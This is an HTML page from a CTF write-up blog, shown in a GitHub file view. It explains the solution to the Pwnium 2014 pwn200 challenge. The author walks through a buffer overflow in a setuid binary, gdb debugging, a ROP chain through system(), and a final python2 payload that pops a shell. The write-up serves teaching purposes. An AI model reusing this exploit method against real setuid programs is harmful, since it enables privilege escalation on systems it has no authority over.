-
Notifications
You must be signed in to change notification settings - Fork 0
/
be-a-robot.html
416 lines (348 loc) · 23.4 KB
/
be-a-robot.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
<!DOCTYPE html>
<html lang="en">
<head>
<title>Be a Robot</title>
<meta charset="utf-8" />
<link href="http://krebsco.de/atom.xml" type="application/atom+xml" rel="alternate" title="Krebs CTF Writeups Full Atom Feed" />
<!-- Mobile viewport optimized: j.mp/bplateviewport -->
<meta name="viewport" content="width=device-width,initial-scale=1, maximum-scale=1">
<link rel="stylesheet" type="text/css" href="./theme/gumby.css" />
<link rel="stylesheet" type="text/css" href="./theme/style.css" />
<link rel="stylesheet" type="text/css" href="./theme/pygment.css" />
<script src="./theme/js/libs/modernizr-2.6.2.min.js"></script>
</head>
<body id="index" class="home">
<div class="container">
<div class="row">
<header id="banner" class="body">
<h1><a href="./">Krebs CTF Writeups <strong></strong></a></h1>
</header><!-- /#banner -->
<div id="navigation" class="navbar row">
<a href="#" gumby-trigger="#navigation > ul" class="toggle"><i class="icon-menu"></i></a>
<ul class="columns">
<li><a href="./">Home</a></li>
<li><a href="/writeups/atom.xml">RSS</a></li>
<li><a href="./pages/contact.html">Contact</a></li>
</ul>
</div>
<section id="content" class="body">
<div class="row">
<div class="eleven columns">
<header>
<h2 class="entry-title">
<a href="./be-a-robot.html" rel="bookmark"
title="Permalink to Be a Robot">Be a Robot</a></h2>
</header>
<footer class="post-info">
<abbr class="published" title="2014-07-30T00:00:00">
Wed 30 July 2014
</abbr>
<address class="vcard author">By
<a class="url fn" href="./author/makefu.html"> makefu</a>
</address>
</footer><!-- /.post-info -->
<div class="entry-content">
<ul>
<li><strong>Solved by</strong>: makefu</li>
</ul>
<h2>Intro</h2>
<p>First of all, this is a post-mortem solution for pwn200 as we failed to finish
it within ctf time both because the challenge was offline alot of the time and
that we were not experienced enough to find a solution.</p>
<p>The challenge was to elevate privileges on a remote server to a user which was
able to read the file $HOME/flag . The folder also contained a file named
pwn200 which had suid bit set for the user -> pop a shell by finding a vuln in
this program.</p>
<h2>Track the Vuln</h2>
<p>Running the program looks like this:</p>
<div class="highlight"><pre><span class="nv">$ </span>./pwn200
Name: Bob
Age: 10
Goodbye little boy
<span class="nv">$ </span>./pwn200
Name: Khan
Age: -1
<span class="o">[</span>1<span class="o">]</span> 6141 segmentation fault ./pwn200
</pre></div>
<p>When supplying a negative age <code>eax</code> will not be updated in the function atExit
and the pointer will stay uninitialized. </p>
<p><img alt="failed check in atExit" src="data/be_a_robot/atExit.png" /></p>
<p>The fgets which reads the name contains a buffer overflow which allows us to override exactly this pointer.</p>
<p><img alt="bof in read_user" src="data/be_a_robot/read_user.png" /></p>
<p>Trying it in gdb looks like this:</p>
<div class="highlight"><pre><span class="p">(</span><span class="nx">gdb</span><span class="p">)</span> <span class="nx">br</span> <span class="o">*</span><span class="mh">0x8048670</span> <span class="err">#</span> <span class="nx">call</span> <span class="nx">eax</span>
<span class="nx">Breakpoint</span> <span class="mi">1</span> <span class="nx">at</span> <span class="mh">0x8048670</span>
<span class="p">(</span><span class="nx">gdb</span><span class="p">)</span> <span class="nx">r</span>
<span class="nx">Starting</span> <span class="nx">program</span><span class="o">:</span> <span class="err">/home/makefu/pwnium/200/pwn200 </span>
<span class="nx">warning</span><span class="o">:</span> <span class="nx">Could</span> <span class="nx">not</span> <span class="nx">load</span> <span class="nx">shared</span> <span class="nx">library</span> <span class="nx">symbols</span> <span class="k">for</span> <span class="nx">linux</span><span class="o">-</span><span class="nx">gate</span><span class="p">.</span><span class="nx">so</span><span class="p">.</span><span class="mi">1</span><span class="p">.</span>
<span class="nx">Do</span> <span class="nx">you</span> <span class="nx">need</span> <span class="s2">"set solib-search-path"</span> <span class="nx">or</span> <span class="s2">"set sysroot"</span><span class="o">?</span>
<span class="nx">Name</span><span class="o">:</span> <span class="nx">AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA</span>
<span class="nx">Breakpoint</span> <span class="mi">1</span><span class="p">,</span> <span class="mh">0x08048670</span> <span class="k">in</span> <span class="nx">atExit</span> <span class="p">()</span>
<span class="p">(</span><span class="nx">gdb</span><span class="p">)</span> <span class="nx">disass</span>
<span class="nx">Dump</span> <span class="nx">of</span> <span class="nx">assembler</span> <span class="nx">code</span> <span class="k">for</span> <span class="kd">function</span> <span class="nx">atExit</span><span class="o">:</span>
<span class="mh">0x08048660</span> <span class="o"><+</span><span class="mi">36</span><span class="o">>:</span> <span class="nx">cmp</span> <span class="nx">DWORD</span> <span class="nx">PTR</span> <span class="cp">[</span><span class="nx">ebp</span><span class="o">+</span><span class="mh">0x8</span><span class="cp">]</span><span class="p">,</span><span class="mh">0x0</span>
<span class="mh">0x08048664</span> <span class="o"><+</span><span class="mi">40</span><span class="o">>:</span> <span class="nx">jle</span> <span class="mh">0x804866d</span> <span class="o"><</span><span class="nx">atExit</span><span class="o">+</span><span class="mi">49</span><span class="o">></span>
<span class="mh">0x08048666</span> <span class="o"><+</span><span class="mi">42</span><span class="o">>:</span> <span class="nx">mov</span> <span class="nx">DWORD</span> <span class="nx">PTR</span> <span class="cp">[</span><span class="nx">ebp</span><span class="o">-</span><span class="mh">0xc</span><span class="cp">]</span><span class="p">,</span><span class="mh">0x804860c</span>
<span class="mh">0x0804866d</span> <span class="o"><+</span><span class="mi">49</span><span class="o">>:</span> <span class="nx">mov</span> <span class="nx">eax</span><span class="p">,</span><span class="nx">DWORD</span> <span class="nx">PTR</span> <span class="cp">[</span><span class="nx">ebp</span><span class="o">-</span><span class="mh">0xc</span><span class="cp">]</span>
<span class="o">=></span> <span class="mh">0x08048670</span> <span class="o"><+</span><span class="mi">52</span><span class="o">>:</span> <span class="nx">call</span> <span class="nx">eax</span>
<span class="mh">0x08048672</span> <span class="o"><+</span><span class="mi">54</span><span class="o">>:</span> <span class="nx">leave</span>
<span class="mh">0x08048673</span> <span class="o"><+</span><span class="mi">55</span><span class="o">>:</span> <span class="nx">ret</span>
<span class="nx">End</span> <span class="nx">of</span> <span class="nx">assembler</span> <span class="nx">dump</span><span class="p">.</span>
<span class="p">(</span><span class="nx">gdb</span><span class="p">)</span> <span class="nx">i</span> <span class="nx">r</span> <span class="nx">eax</span>
<span class="nx">eax</span> <span class="mh">0x41414141</span> <span class="mi">1094795585</span>
</pre></div>
<h2>Prepare the stack for ROP</h2>
<p>We cannot directly execute our name string as both ASLR and NX-Stack are enabled but there is a system call in a unused function called <code>test</code>:</p>
<div class="highlight"><pre><span class="p">(</span><span class="nx">gdb</span><span class="p">)</span> <span class="nx">disassemble</span> <span class="nx">test</span>
<span class="nx">Dump</span> <span class="nx">of</span> <span class="nx">assembler</span> <span class="nx">code</span> <span class="k">for</span> <span class="kd">function</span> <span class="nx">test</span><span class="o">:</span>
<span class="mh">0x08048694</span> <span class="o"><+</span><span class="mi">0</span><span class="o">>:</span> <span class="nx">push</span> <span class="nx">ebp</span>
<span class="mh">0x08048695</span> <span class="o"><+</span><span class="mi">1</span><span class="o">>:</span> <span class="nx">mov</span> <span class="nx">ebp</span><span class="p">,</span><span class="nx">esp</span>
<span class="mh">0x08048697</span> <span class="o"><+</span><span class="mi">3</span><span class="o">>:</span> <span class="nx">sub</span> <span class="nx">esp</span><span class="p">,</span><span class="mh">0x8</span>
<span class="mh">0x0804869a</span> <span class="o"><+</span><span class="mi">6</span><span class="o">>:</span> <span class="nx">sub</span> <span class="nx">esp</span><span class="p">,</span><span class="mh">0xc</span>
<span class="mh">0x0804869d</span> <span class="o"><+</span><span class="mi">9</span><span class="o">>:</span> <span class="nx">push</span> <span class="mh">0x80487f3</span>
<span class="mh">0x080486a2</span> <span class="o"><+</span><span class="mi">14</span><span class="o">>:</span> <span class="nx">call</span> <span class="mh">0x8048430</span> <span class="o"><</span><span class="nx">system</span><span class="err">@</span><span class="nx">plt</span><span class="o">></span>
<span class="mh">0x080486a7</span> <span class="o"><+</span><span class="mi">19</span><span class="o">>:</span> <span class="nx">add</span> <span class="nx">esp</span><span class="p">,</span><span class="mh">0x10</span>
<span class="mh">0x080486aa</span> <span class="o"><+</span><span class="mi">22</span><span class="o">>:</span> <span class="nx">leave</span>
<span class="mh">0x080486ab</span> <span class="o"><+</span><span class="mi">23</span><span class="o">>:</span> <span class="nx">ret</span>
<span class="nx">End</span> <span class="nx">of</span> <span class="nx">assembler</span> <span class="nx">dump</span><span class="p">.</span>
</pre></div>
<p>Too bad we cannot directly prepare the stack with our provided text to supply a string which then can be executed. </p>
<p>To be clear: we currently only control <code>eip</code>, not the <code>esp</code>. ROP to the rescue!</p>
<p>This is how our stack must look like for a successful exploit:</p>
<table>
<thead>
<tr>
<th>Address</th>
<th align="right">Description</th>
</tr>
</thead>
<tbody>
<tr>
<td>call system</td>
<td align="right"><- esp</td>
</tr>
<tr>
<td>[command-string]</td>
<td align="right"><- esp + 4 (first argument)</td>
</tr>
</tbody>
</table>
<p>We cannot call system directly because after the call as ebp+4 will be pointing to our provided jump address.
The ROP gadget i used is a simple 'pop-ret' which can be found with for example <a href="http://shell-storm.org/project/ROPgadget/">msfrop</a> or <a href="http://shell-storm.org/project/ROPgadget/">ROPgadget</a> in conjuction with a <code>system</code> call. POP-RET is at <code>0x080487a6</code>. </p>
<p>By that we can prepare our input as an argument for the system call. As we have no shell command yet we will used <code>0x80487f3</code> - 'echo pwned' for testing.</p>
<h3>Follow the Execution Flow</h3>
<p>These tables show the stack after each ROP step.</p>
<p><strong>Before call ROP</strong></p>
<table>
<thead>
<tr>
<th align="left">Address</th>
<th align="center">Description</th>
</tr>
</thead>
<tbody>
<tr>
<td align="left">[A*36]</td>
<td align="center">BOF Filler</td>
</tr>
<tr>
<td align="left">[AAAA]</td>
<td align="center">BOF Filler</td>
</tr>
<tr>
<td align="left">0x080486a2 <code>esp</code></td>
<td align="center">call system</td>
</tr>
<tr>
<td align="left">0x080487f3</td>
<td align="center">"echo hacked"</td>
</tr>
<tr>
<td align="left">[BBBB]</td>
<td align="center">Filler</td>
</tr>
<tr>
<td align="left">0x080487a6 <code>eip</code></td>
<td align="center">pop ebx;ret</td>
</tr>
</tbody>
</table>
<p><strong>After ret from pop-ret ROP Gadget</strong></p>
<table>
<thead>
<tr>
<th align="left">Address</th>
<th align="center">Description</th>
</tr>
</thead>
<tbody>
<tr>
<td align="left">[A*32]</td>
<td align="center">BOF Filler</td>
</tr>
<tr>
<td align="left">0x08048672</td>
<td align="center">ret addr call-eax</td>
</tr>
<tr>
<td align="left">0x080486a2</td>
<td align="center">call system</td>
</tr>
<tr>
<td align="left">0x080487f3 <code>esp</code></td>
<td align="center">"echo hacked"</td>
</tr>
<tr>
<td align="left">[BBBB]</td>
<td align="center">Filler</td>
</tr>
<tr>
<td align="left">0x080487a6</td>
<td align="center">pop ebx;ret</td>
</tr>
</tbody>
</table>
<p><strong>After call system</strong></p>
<table>
<thead>
<tr>
<th align="left">Address</th>
<th align="center">Description</th>
</tr>
</thead>
<tbody>
<tr>
<td align="left">[A*32]</td>
<td align="center">BOF Filler</td>
</tr>
<tr>
<td align="left">0x08048672</td>
<td align="center">ret addr call-eax</td>
</tr>
<tr>
<td align="left">0x080486a2 <code>esp</code></td>
<td align="center">ret addr call-system</td>
</tr>
<tr>
<td align="left">0x080487f3 <code>parm1</code></td>
<td align="center">"echo hacked"</td>
</tr>
<tr>
<td align="left">[BBBB]</td>
<td align="center">Filler</td>
</tr>
<tr>
<td align="left">0x080487a6</td>
<td align="center">pop ebx;ret</td>
</tr>
</tbody>
</table>
<p><strong>Quick Sidenote:</strong></p>
<ol>
<li><code>call address</code> pushes the return address($eip+sizeof(call)) onto the stack and executes the function at <strong>address</strong>.</li>
<li><em>ret</em> pops the return address from the stack and executes the address</li>
</ol>
<p>The payload generation and testing looks like this:</p>
<div class="highlight"><pre>python2 -c <span class="s1">'print("A"*36+"\xa2\x86\x04\x08"+"\x01\x8c\x04\x08"+"BBBB"+ "\xa6\x87\x04\x08"+"CCCC"+"DDDD"+ "EEE\n" +"-1")'</span> > in
gdb ./pwn200
<span class="o">(</span>gdb<span class="o">)</span> r < in
Starting program: ./pwn200 < in
hacked
Name: Age: <span class="o">[</span>Inferior 1 <span class="o">(</span>process 11968<span class="o">)</span> exited normally<span class="o">]</span>
</pre></div>
<h3>Find the exec string</h3>
<p>We need a string address for system argument which allows us to run whatever commands we want. Due to the fact aslr is enabled hitting our 36 bytes short buffer is kind of unlikely. Using environment variables with <code>" "\*9001 +"/bin/sh"</code> may give us a better chance to guess the address but is still pretty crude.</p>
<p><code>"sh"</code> which is short and gives us full access may reside in the executable after being loaded in the memory so i gave it a shot with gdb:</p>
<div class="highlight"><pre><span class="p">(</span><span class="n">gdb</span><span class="p">)</span> <span class="k">break</span> <span class="n">main</span>
<span class="n">Breakpoint</span> <span class="mi">1</span> <span class="n">at</span> <span class="mh">0x8048701A</span>
<span class="p">(</span><span class="n">gdb</span><span class="p">)</span> <span class="n">start</span>
<span class="p">(</span><span class="n">gdb</span><span class="p">)</span> <span class="n">info</span> <span class="n">proc</span> <span class="n">mappings</span>
<span class="n">process</span> <span class="mi">11324</span>
<span class="n">Mapped</span> <span class="n">address</span> <span class="n">spaces</span><span class="o">:</span>
<span class="n">Start</span> <span class="n">Addr</span> <span class="n">End</span> <span class="n">Addr</span> <span class="n">Size</span> <span class="n">Offset</span> <span class="n">objfile</span>
<span class="mh">0x8048000</span> <span class="mh">0x8049000</span> <span class="mh">0x1000</span> <span class="mh">0x0</span> <span class="o">/</span><span class="n">home</span><span class="o">/</span><span class="n">makefu</span><span class="o">/</span><span class="n">pwnium</span><span class="o">/</span><span class="mi">200</span><span class="o">/</span><span class="n">pwn200</span>
<span class="mh">0x8049000</span> <span class="mh">0x804a000</span> <span class="mh">0x1000</span> <span class="mh">0x0</span> <span class="o">/</span><span class="n">home</span><span class="o">/</span><span class="n">makefu</span><span class="o">/</span><span class="n">pwnium</span><span class="o">/</span><span class="mi">200</span><span class="o">/</span><span class="n">pwn200</span>
<span class="mh">0xf7564000</span> <span class="mh">0xf7565000</span> <span class="mh">0x1000</span> <span class="mh">0x0</span>
<span class="mh">0xf7565000</span> <span class="mh">0xf7720000</span> <span class="mh">0x1bb000</span> <span class="mh">0x0</span> <span class="o">/</span><span class="n">usr</span><span class="o">/</span><span class="n">lib32</span><span class="o">/</span><span class="n">libc</span><span class="o">-</span><span class="mf">2.19</span><span class="p">.</span><span class="n">so</span>
<span class="mh">0xf7720000</span> <span class="mh">0xf7723000</span> <span class="mh">0x3000</span> <span class="mh">0x1ba000</span> <span class="o">/</span><span class="n">usr</span><span class="o">/</span><span class="n">lib32</span><span class="o">/</span><span class="n">libc</span><span class="o">-</span><span class="mf">2.19</span><span class="p">.</span><span class="n">so</span>
<span class="mh">0xf7723000</span> <span class="mh">0xf7725000</span> <span class="mh">0x2000</span> <span class="mh">0x1bd000</span> <span class="o">/</span><span class="n">usr</span><span class="o">/</span><span class="n">lib32</span><span class="o">/</span><span class="n">libc</span><span class="o">-</span><span class="mf">2.19</span><span class="p">.</span><span class="n">so</span>
<span class="mh">0xf7725000</span> <span class="mh">0xf7727000</span> <span class="mh">0x2000</span> <span class="mh">0x0</span>
<span class="mh">0xf7757000</span> <span class="mh">0xf7759000</span> <span class="mh">0x2000</span> <span class="mh">0x0</span>
<span class="mh">0xf7759000</span> <span class="mh">0xf775a000</span> <span class="mh">0x1000</span> <span class="mh">0x0</span> <span class="p">[</span><span class="n">vdso</span><span class="p">]</span>
<span class="mh">0xf775a000</span> <span class="mh">0xf777b000</span> <span class="mh">0x21000</span> <span class="mh">0x0</span> <span class="o">/</span><span class="n">usr</span><span class="o">/</span><span class="n">lib32</span><span class="o">/</span><span class="n">ld</span><span class="o">-</span><span class="mf">2.19</span><span class="p">.</span><span class="n">so</span>
<span class="mh">0xf777b000</span> <span class="mh">0xf777c000</span> <span class="mh">0x1000</span> <span class="mh">0x0</span>
<span class="mh">0xf777c000</span> <span class="mh">0xf777d000</span> <span class="mh">0x1000</span> <span class="mh">0x21000</span> <span class="o">/</span><span class="n">usr</span><span class="o">/</span><span class="n">lib32</span><span class="o">/</span><span class="n">ld</span><span class="o">-</span><span class="mf">2.19</span><span class="p">.</span><span class="n">so</span>
<span class="mh">0xf777d000</span> <span class="mh">0xf777e000</span> <span class="mh">0x1000</span> <span class="mh">0x22000</span> <span class="o">/</span><span class="n">usr</span><span class="o">/</span><span class="n">lib32</span><span class="o">/</span><span class="n">ld</span><span class="o">-</span><span class="mf">2.19</span><span class="p">.</span><span class="n">so</span>
<span class="mh">0xffeba000</span> <span class="mh">0xffedb000</span> <span class="mh">0x21000</span> <span class="mh">0x0</span> <span class="p">[</span><span class="n">stack</span><span class="p">]</span>
<span class="p">(</span><span class="n">gdb</span><span class="p">)</span> <span class="n">find</span> <span class="mh">0x08048000</span><span class="p">,</span> <span class="o">+</span><span class="mi">5000</span><span class="p">,</span> <span class="s">"sh"</span>
<span class="mh">0x8048c01</span>
<span class="mi">1</span> <span class="n">pattern</span> <span class="n">found</span><span class="p">.</span>
</pre></div>
<p>Instead of 0x80487f3 we are now using 0x8048c01.</p>
<h2>Putting it all together</h2>
<div class="highlight"><pre><span class="c"># first pipe the shellcode, then use stdin</span>
<span class="o">(</span>python2 -c <span class="s1">'print("A"*36+"\xa2\x86\x04\x08"+"\x01\x8c\x04\x08"+"BBBB"+ "\xa6\x87\x04\x08"+"CCCC"+"DDDD"+ "EEE\n" +"-1")'</span>; cat<span class="o">)</span> | ./pwn200
ls /
bin dev krebs media root sbin sys usr var
boot etc home lib mnt proc run tmp
</pre></div>
<h2>Cheers</h2>
<p>To <a href="https://ctftime.org/team/6997">Team Action Kaktus</a> on ctftime for making a writeup with a nonfunct solution, this made me try hard enough to finish it by myself.</p>
<p><a href="data/be_a_robot/pwn200">Download the pwn200 binary</a></p>
</div><!-- /.entry-content -->
</div><!-- /.eleven.columns -->
<div class="three columns">
<h4>Pages</h4>
<ul>
<li><a href="/writeups/atom.xml">RSS</a></li>
<li><a href="./pages/contact.html">Contact</a></li>
</ul>
<!--<h4>Categories</h4>
<ul>
<li><a href="./category/posts.html">posts</a></li>
</ul>
-->
<h4>Tags</h4>
<ul>
<li class="tag-2"><a href="./tag/captcha.html">captcha</a></li>
<li class="tag-0"><a href="./tag/pwnium2014.html">pwnium2014</a></li>
<li class="tag-4"><a href="./tag/hitconctf2014.html">hitconctf2014</a></li>
<li class="tag-4"><a href="./tag/2048.html">2048</a></li>
<li class="tag-4"><a href="./tag/post-mortem.html">post-mortem</a></li>
<li class="tag-1"><a href="./tag/crackme.html">crackme</a></li>
<li class="tag-4"><a href="./tag/sha1lcode.html">sha1lcode</a></li>
</ul>
<nav class="widget">
<h4>Social</h4>
<ul>
<li><a href="http://twitter.com/krebsbob">@krebsbob</a></li>
<li><a href="irc://irc.freenode.net#krebs">irc.freenode.net#krebs</a></li>
</ul>
</nav>
</div> </div><!-- /.row -->
</section>
</div><!-- /.row -->
</div><!-- /.container -->
<div class="container.nopad bg">
<footer id="credits" class="row">
<div class="seven columns left-center">
<address id="about" class="vcard body">
Proudly powered by <a href="http://getpelican.com/">Pelican</a>,
which takes great advantage of <a href="http://python.org">Python</a>.
<br />
Based on the <a target="_blank" href="http://gumbyframework.com">Gumby Framework</a>
</address>
</div>
<div class="seven columns">
<div class="row">
<ul class="socbtns">
</ul>
</div>
</div>
</footer>
</div>
<script src="./theme/js/libs/jquery-1.9.1.min.js"></script>
<script src="./theme/js/libs/gumby.min.js"></script>
<script src="./theme/js/plugins.js"></script>
</body>
</html>